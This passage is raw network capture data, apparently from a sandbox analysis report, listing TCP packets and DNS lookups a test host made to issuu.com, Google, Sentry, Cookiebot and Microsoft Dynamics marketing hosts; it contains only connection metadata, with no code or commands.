                                                                                                          Dec 24, 2024 20:57:28.452675104 CET4434988920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:28.500091076 CET49890443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:28.500091076 CET49889443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:28.500108004 CET4434988920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:28.545897961 CET49889443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:28.810085058 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:28.810710907 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:28.810725927 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:28.812443972 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:28.812527895 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:28.813481092 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:28.813621998 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:28.813735962 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:28.813744068 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:28.865885019 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.019498110 CET4434989020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.019540071 CET4434988920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.073154926 CET49890443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.073163033 CET49889443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.256587029 CET4434988920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.256724119 CET4434989020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.309055090 CET49889443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.309076071 CET49890443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.309078932 CET4434988920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.309082985 CET4434989020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.310255051 CET49889443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.310337067 CET4434988920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.310389042 CET49889443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.310600042 CET49890443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.310739994 CET4434989020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.310797930 CET49890443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.425508022 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.457007885 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.457048893 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.457102060 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.457326889 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.457417965 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.457478046 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.457596064 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.457608938 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.457798004 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.457842112 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.477435112 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.477447033 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.527676105 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.618284941 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.618318081 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.618349075 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.668847084 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.668854952 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.669778109 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:29.669867992 CET4434989220.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.669934988 CET49892443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.810688972 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.811091900 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.811156034 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.811417103 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.811625004 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.811644077 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.814615011 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.814709902 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.814770937 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.814827919 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.815023899 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.815112114 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.815298080 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.815382004 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.815448046 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.815469027 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.815505981 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.815512896 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:30.865757942 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:30.865766048 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.376199007 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.380642891 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.427839994 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.427859068 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.611103058 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.616491079 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.662408113 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.662415028 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.662420034 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.662451029 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.663881063 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.663984060 CET4434990020.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.664064884 CET49900443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.664849997 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.664932013 CET4434989920.117.200.191192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.664994955 CET49899443192.168.2.420.117.200.191
                                                                                                          Dec 24, 2024 20:57:31.773895025 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:31.773948908 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:31.774065971 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:31.774323940 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:31.774346113 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.000024080 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.000279903 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.000305891 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.003869057 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.004034996 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.004259109 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.004430056 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.004578114 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.004585028 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.004631996 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.047339916 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.055133104 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.445230961 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.445427895 CET4434990835.241.35.151192.168.2.4
                                                                                                          Dec 24, 2024 20:57:33.445492983 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.445787907 CET49908443192.168.2.435.241.35.151
                                                                                                          Dec 24, 2024 20:57:33.445804119 CET4434990835.241.35.151192.168.2.4
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 24, 2024 20:56:09.694794893 CET53516531.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:09.711734056 CET53494851.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:12.500087976 CET5616553192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:12.500261068 CET5475853192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:12.552551031 CET53558801.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:12.637013912 CET53561651.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:12.637120962 CET53547581.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:14.996470928 CET6322353192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:14.996738911 CET6292153192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:15.134006023 CET53632231.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:15.134877920 CET53629211.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:17.055910110 CET5978753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:17.056047916 CET6254253192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:17.274079084 CET53625421.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.185318947 CET5923153192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:19.185465097 CET5602753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:19.321872950 CET53592311.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.322376013 CET53560271.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.630297899 CET53515991.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:21.363689899 CET5910753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:21.363873005 CET6477953192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:21.500958920 CET53591071.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:21.501147985 CET53647791.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:22.901978016 CET6457653192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:22.902149916 CET5035453192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:23.002332926 CET5764153192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:23.002540112 CET5358253192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:23.009980917 CET6207853192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:23.010301113 CET6522953192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:23.039611101 CET53503541.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:23.236457109 CET53535821.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:23.260592937 CET53576411.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:23.316210985 CET53652291.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:23.330826998 CET53644821.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:23.389800072 CET6124653192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:23.390000105 CET5673453192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:23.527261019 CET53612461.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:23.529952049 CET53567341.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:24.967384100 CET5209453192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:24.967715025 CET5340753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.031497955 CET6245253192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.031964064 CET5422653192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.088217020 CET5735153192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.088639975 CET5900753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.172385931 CET53542261.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:25.172537088 CET53624521.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:25.187335014 CET5648153192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.187545061 CET6075753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.189523935 CET6185753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.190254927 CET5218253192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.195473909 CET5563353192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.195979118 CET5075653192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.224965096 CET53573511.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:25.225251913 CET53590071.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:25.262679100 CET6159753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.262913942 CET6019253192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:25.333729982 CET53507561.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:25.410360098 CET53521821.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:25.538271904 CET53601921.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:25.578398943 CET53607571.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:27.753741026 CET6534953192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:27.762564898 CET5466653192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:27.992341042 CET53546661.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:28.391186953 CET138138192.168.2.4192.168.2.255
                                                                                                          Dec 24, 2024 20:56:28.455267906 CET5107353192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:28.455794096 CET5217853192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:28.458614111 CET5021053192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:28.459009886 CET5858853192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:28.463043928 CET5056553192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:28.463206053 CET6209053192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:28.594108105 CET53521781.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:28.599349022 CET53585881.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:28.601099014 CET53620901.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:29.694883108 CET53651461.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:30.342595100 CET6304853192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:30.342721939 CET5615353192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:30.480420113 CET53561531.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:33.092165947 CET4974453192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:33.092396975 CET5780553192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:33.230016947 CET53578051.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:33.231836081 CET53497441.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:36.640049934 CET5637353192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:36.640500069 CET5230553192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:36.776642084 CET53563731.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:36.778228998 CET53523051.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:38.279958963 CET5530453192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:38.280087948 CET5625053192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:49.129132986 CET53543291.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:56:59.914011002 CET5540753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:59.914167881 CET5771953192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:59.925832987 CET6097553192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:56:59.925952911 CET5585053192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:05.347443104 CET5728253192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:05.347573996 CET5329853192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:08.303411007 CET53518691.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:11.144748926 CET53574941.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:17.036962986 CET5729953192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:17.037122965 CET5145253192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:17.566761017 CET53572991.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:17.584917068 CET53514521.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:19.811569929 CET5746053192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:19.811722040 CET6483553192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:20.134681940 CET53648351.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:20.154877901 CET53574601.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:22.265137911 CET6142553192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:22.266284943 CET5629153192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:22.587039948 CET53562911.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:22.603852034 CET53614251.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:26.881644964 CET5398753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:26.881788969 CET6198653192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:27.018343925 CET53539871.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:27.020749092 CET53619861.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:27.090209007 CET5284353192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:27.090363026 CET5480753192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:27.429126978 CET53548071.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:27.445463896 CET53528431.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.315498114 CET5372353192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:29.315653086 CET6189153192.168.2.41.1.1.1
                                                                                                          Dec 24, 2024 20:57:29.452507019 CET53618911.1.1.1192.168.2.4
                                                                                                          Dec 24, 2024 20:57:29.456567049 CET53537231.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                          Dec 24, 2024 20:56:42.334307909 CET192.168.2.41.1.1.1c2d9(Port unreachable)Destination Unreachable
                                                                                                          Dec 24, 2024 20:57:00.267026901 CET192.168.2.41.1.1.1c263(Port unreachable)Destination Unreachable
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 24, 2024 20:56:12.500087976 CET192.168.2.41.1.1.10x5e43Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:12.500261068 CET192.168.2.41.1.1.10xa0a4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:14.996470928 CET192.168.2.41.1.1.10x85ebStandard query (0)issuu.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:14.996738911 CET192.168.2.41.1.1.10x7f85Standard query (0)issuu.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:17.055910110 CET192.168.2.41.1.1.10x86Standard query (0)static.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:17.056047916 CET192.168.2.41.1.1.10x5faaStandard query (0)static.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:19.185318947 CET192.168.2.41.1.1.10x7fbcStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:19.185465097 CET192.168.2.41.1.1.10xf453Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:21.363689899 CET192.168.2.41.1.1.10xef4bStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:21.363873005 CET192.168.2.41.1.1.10x6397Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:22.901978016 CET192.168.2.41.1.1.10x6335Standard query (0)static.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:22.902149916 CET192.168.2.41.1.1.10x276bStandard query (0)static.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.002332926 CET192.168.2.41.1.1.10x384fStandard query (0)o4505883345354752.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.002540112 CET192.168.2.41.1.1.10x1bb6Standard query (0)o4505883345354752.ingest.sentry.io65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.009980917 CET192.168.2.41.1.1.10xcafStandard query (0)reader3.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.010301113 CET192.168.2.41.1.1.10x8ad6Standard query (0)reader3.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.389800072 CET192.168.2.41.1.1.10x3860Standard query (0)issuu.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:23.390000105 CET192.168.2.41.1.1.10x8d48Standard query (0)issuu.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:24.967384100 CET192.168.2.41.1.1.10xc0f5Standard query (0)consent.cookiebot.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:24.967715025 CET192.168.2.41.1.1.10x535cStandard query (0)consent.cookiebot.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.031497955 CET192.168.2.41.1.1.10xee8fStandard query (0)pingback.issuu.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.031964064 CET192.168.2.41.1.1.10xd17dStandard query (0)pingback.issuu.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.088217020 CET192.168.2.41.1.1.10x9697Standard query (0)o4505883345354752.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.088639975 CET192.168.2.41.1.1.10x2c22Standard query (0)o4505883345354752.ingest.sentry.io65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.187335014 CET192.168.2.41.1.1.10x63dcStandard query (0)api.issuu.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.187545061 CET192.168.2.41.1.1.10x25c0Standard query (0)api.issuu.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.189523935 CET192.168.2.41.1.1.10x1387Standard query (0)assets.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.190254927 CET192.168.2.41.1.1.10xb555Standard query (0)assets.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.195473909 CET192.168.2.41.1.1.10x658Standard query (0)reader3.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.195979118 CET192.168.2.41.1.1.10x8d5Standard query (0)reader3.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.262679100 CET192.168.2.41.1.1.10x3a2Standard query (0)layers.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:25.262913942 CET192.168.2.41.1.1.10x241bStandard query (0)layers.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:27.753741026 CET192.168.2.41.1.1.10xc464Standard query (0)image.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:27.762564898 CET192.168.2.41.1.1.10xba07Standard query (0)image.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.455267906 CET192.168.2.41.1.1.10xcfefStandard query (0)assets.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.455794096 CET192.168.2.41.1.1.10x6a1bStandard query (0)assets.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.458614111 CET192.168.2.41.1.1.10xe09aStandard query (0)api.issuu.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.459009886 CET192.168.2.41.1.1.10xa382Standard query (0)api.issuu.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.463043928 CET192.168.2.41.1.1.10xe68bStandard query (0)layers.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:28.463206053 CET192.168.2.41.1.1.10x6827Standard query (0)layers.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:30.342595100 CET192.168.2.41.1.1.10x79acStandard query (0)image.isu.pubA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:30.342721939 CET192.168.2.41.1.1.10xac0eStandard query (0)image.isu.pub65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:33.092165947 CET192.168.2.41.1.1.10x696cStandard query (0)spidersense.bendingspoons.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:33.092396975 CET192.168.2.41.1.1.10x3bc3Standard query (0)spidersense.bendingspoons.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:36.640049934 CET192.168.2.41.1.1.10x5832Standard query (0)spidersense.bendingspoons.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:36.640500069 CET192.168.2.41.1.1.10xc946Standard query (0)spidersense.bendingspoons.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:38.279958963 CET192.168.2.41.1.1.10x1220Standard query (0)assets-eur.mkt.dynamics.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:38.280087948 CET192.168.2.41.1.1.10x3de0Standard query (0)assets-eur.mkt.dynamics.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:59.914011002 CET192.168.2.41.1.1.10x8141Standard query (0)public-eur.mkt.dynamics.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:59.914167881 CET192.168.2.41.1.1.10x7e9bStandard query (0)public-eur.mkt.dynamics.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:59.925832987 CET192.168.2.41.1.1.10x172dStandard query (0)assets-eur.mkt.dynamics.comA (IP address)IN (0x0001)false
                                                                                                          Dec 24, 2024 20:56:59.925952911 CET192.168.2.41.1.1.10xb805Standard query (0)assets-eur.mkt.dynamics.com65IN (0x0001)false
                                                                                                          Dec 24, 2024 20:57:05.347443104 CET192.168.2.41.1.1.10x6e54Standard query (0)public-eur.mkt.dynamics.comA (IP address)IN (0x0001)false
